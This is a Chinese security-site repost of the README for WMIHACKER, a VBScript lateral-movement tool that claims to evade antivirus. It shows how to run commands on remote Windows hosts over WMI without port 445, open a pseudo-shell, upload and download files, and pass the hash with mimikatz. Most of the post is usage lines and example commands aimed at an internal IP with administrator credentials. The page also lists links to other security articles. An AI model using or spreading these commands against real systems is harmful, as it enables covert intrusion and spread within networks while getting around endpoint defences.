服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

一款免杀横向移动命令执行测试工具

日期: 来源:乌雲安全收集编辑:rootclay

作者:rootclay,给作者点个star

原文地址:https://github.com/rootclay/WMIHACKER

免杀横向移动命令执行测试工具(无需445端口)

介绍:免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。(无需445端口)

主要功能:1、命令执行;2、文件上传;3、文件下载;4、PTH使用

使用

合并Issue 1里PTH的使用方法:

第54-58行代码:

if user = "-" And pass = "-" Then
set objWMIService = objLocator.connectserver(host,"root/cimv2")
Set SubobjSWbemServices = objLocator.ConnectServer(host, "root\subscription")
Set regWMIService = objLocator.ConnectServer(host, "root\default")

用户名和密码填“-”,结合mimikatz的PTH就可以进行WMI的PTH了。
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs

__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?

WMIHACKER.vbs /shell host user pass

WMIHACKER.vbs /upload host user pass localpath remotepath

WMIHACKER.vbs /download host user pass localpath remotepath

/cmd single command mode
host hostname or IP address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host

有命令回显执行方式> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1无命令回显> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0模拟shell模式> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"文件上传-复制本机calc.exe到远程主机c:\calc.exe> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"文件下载-下载远程主机calc.exe到本地c:\calc.exe> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"

下载地址:
https://github.com/rootclay/WMIHACKER

相关阅读

  • 一款快速探测数据库信息工具

  • 原创作者:lele8转载于:https://github.com/lele8/Sqlinfo功能在内网渗透中快速获取数据库所有库名,表名,列名;具体判断后再去翻数据,节省时间。工具支持mysql,mssql,PostgreSQL,redis
  • CISSP考证攻略(附培训试听教程)

  • 文末加好友开通培训试听教程CISSP含金量高CISSP注册信息系统安全师认证是信息安全领域被全球广泛认可的IT安全认证,一直以来被誉为业界的“金牌标准”。CISSP认证不仅是对个
  • NISP二级证书含金量如何

  • 国家信息安全水平考试(National Information Security Test Program,简称NISP),是由中国信息安全测评中心实施培养国家网络空间安全人才的项目。为培养更多优秀的实践型网络安全
  • 干货|API接口渗透测试技巧汇总

  • 作者:白河愁,来源:先知社区1 API 接口介绍1.1 RPC(远程过程调用)远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用
  • Gradle常用的几十个命令!

  • 本文作者作者:yechaoa链接:https://juejin.cn/post/7171493698243395597本文由作者授权发布。前言Gradle的命令有很多,熟悉常用命令之后,在日常开发中,不仅可以提升效率,也可以辅
  • [0217] 一周重点威胁情报|天际友盟情报站

  • 热点情报微软补丁日通告:2023年2月版WIP26间谍组织入侵中东地区针对利用垃圾邮件传播恶意木马的攻击活动分析疑似DoNot组织借助Excel附件攻击巴基斯坦国防部门东南亚新APT组
  • 下载超2000万次,这些钓鱼APP赶快卸载

  • 出处:freebuf公众号最近,一种新的活动跟踪应用程序在 Android 的官方应用程序商店 Google Play 上取得了巨大收获,其下载量已经超过2000万次。这些应用程序将自己包装为健康、
  • 扫黑除恶!网络安全实战攻略分享

  • 首先,对于网络安全初学者,选择适合的方向和方法至关重要!有的同学完全没有计算机功底,上来就去学渗透、学逆向破解App,结果折腾半天,学了点皮毛就被“劝退”了。因此,学网络安全,是

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 一款免杀横向移动命令执行测试工具

  • 作者:rootclay,给作者点个star原文地址:https://github.com/rootclay/WMIHACKER免杀横向移动命令执行测试工具(无需445端口)介绍:免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXE
  • 实战|记录一次通过不断FUZZ从而获取万元赏金

  • 0x01 前言下午,一个老朋友发来一批资产让我找个有效漏洞,原因是厂商弄活动,提交有效漏洞可获取其奖品,那个奖品对朋友很有吸引力。0x02 漏洞背景一个后台系统,称其为https://mana
  • 推进少儿妇科建设,呵护“花蕊”生殖健康

  • 专家介绍 尹玲:北京大学第一医院妇产科主任医师,硕士生导师,知名专家;北京大学第一医院妇科内镜培训中心负责人、少儿妇科学组组长;北京常春藤医学高端人才联盟副主席,常
  • 实战|红队从入门到精通

  • 一、课程简介承制渗透测试特训班是以项目制思想为根本 ,教会学员如何进行项目实施 ,包括漏洞扫描服务、渗透测试服务、应急响应服务。传统类型培训以技能为核心,项目交付是弱项
  • 一款快速探测数据库信息工具

  • 原创作者:lele8转载于:https://github.com/lele8/Sqlinfo功能在内网渗透中快速获取数据库所有库名,表名,列名;具体判断后再去翻数据,节省时间。工具支持mysql,mssql,PostgreSQL,redis
  • CISSP考证攻略(附培训试听教程)

  • 文末加好友开通培训试听教程CISSP含金量高CISSP注册信息系统安全师认证是信息安全领域被全球广泛认可的IT安全认证,一直以来被誉为业界的“金牌标准”。CISSP认证不仅是对个